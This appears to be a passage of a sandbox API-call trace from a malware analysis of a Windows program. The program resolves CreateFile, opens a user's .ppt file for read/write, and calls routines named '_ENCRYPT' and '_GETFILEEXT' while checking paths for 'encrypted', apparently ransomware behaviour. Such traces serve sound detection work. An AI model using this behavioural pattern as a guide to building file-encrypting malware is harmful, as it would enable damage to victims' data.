lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.486] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ccd0 [0031.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ccd0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.487] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\rsb1on7f5ytvakx.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.487] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.487] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.487] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.487] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.488] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0031.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.488] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.488] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.488] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.488] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.488] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.488] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.488] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.488] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.488] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.489] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf0b1a0, ftCreationTime.dwHighDateTime=0x1d5c36c, ftLastAccessTime.dwLowDateTime=0xf3fa9760, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0xf3fa9760, ftLastWriteTime.dwHighDateTime=0x1d5bd2a, nFileSizeHigh=0x0, nFileSizeLow=0x8427, dwReserved0=0x0, dwReserved1=0x777648, cFileName="rsB1On7F5ytvakX.ppt", cAlternateFileName="RSB1ON~1.PPT")) returned 0x7c20c0 [0031.489] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.489] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf0b1a0, ftCreationTime.dwHighDateTime=0x1d5c36c, ftLastAccessTime.dwLowDateTime=0xf3fa9760, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0xf3fa9760, ftLastWriteTime.dwHighDateTime=0x1d5bd2a, nFileSizeHigh=0x0, nFileSizeLow=0x8427, dwReserved0=0x0, dwReserved1=0x777648, cFileName="rsB1On7F5ytvakX.ppt", cAlternateFileName="RSB1ON~1.PPT")) returned 0x7c20c0 [0031.489] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.489] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, 